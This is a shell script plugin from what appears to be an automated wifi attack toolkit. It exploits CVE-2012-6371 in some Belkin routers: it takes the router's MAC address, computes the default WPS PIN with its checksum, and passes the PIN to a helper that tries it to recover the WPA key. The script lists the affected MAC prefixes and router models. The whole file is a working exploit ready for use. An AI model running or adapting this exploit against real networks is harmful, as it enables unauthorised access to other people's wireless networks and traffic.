recon/autowifi/plugins/11belkin_wps


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

#!/bin/sh
# thanks to http://ednolo.alumnos.upv.es/?p=1295G
# for the PoC code 
# Calculates the default WPS pin of Belkin Routers and returns the WPA key
#
# Implementation of CVE-2012-6371

# works :
# Belkin_N+_XXXXXX   00:22:75:XX:XX:XX    F5D8235-4 v1000
# belkin.XXX         00:1C:DF:XX:XX:XX    F5D8231-4 v5000
# belkin.XXX         09:86:3B:XX:XX:XX    F9K1104   v1000

cd $(dirname $(readlink -f $0))
. ../lib/plugin_core
. ../lib/wps
parse_plugin_args "$@"

check_painmode

! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1

calc_belkin(){
    PRIVATE_MAC=${1}

    p=$((0x$PRIVATE_MAC % 10000000))
    wps_pin_checksum(){
        pin=$1
        accum=0
        while [ $pin -ne 0 ];do
            accum=$((accum + (3 * (pin % 10)) ))
            pin=$((pin/10))
            accum=$((accum + pin %10 ))
            pin=$((pin/10))
        done
        echo $(( (10 - accum % 10) % 10))
    }
    printf "%07d%d" $p $(wps_pin_checksum $p)
    return 0
}
try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})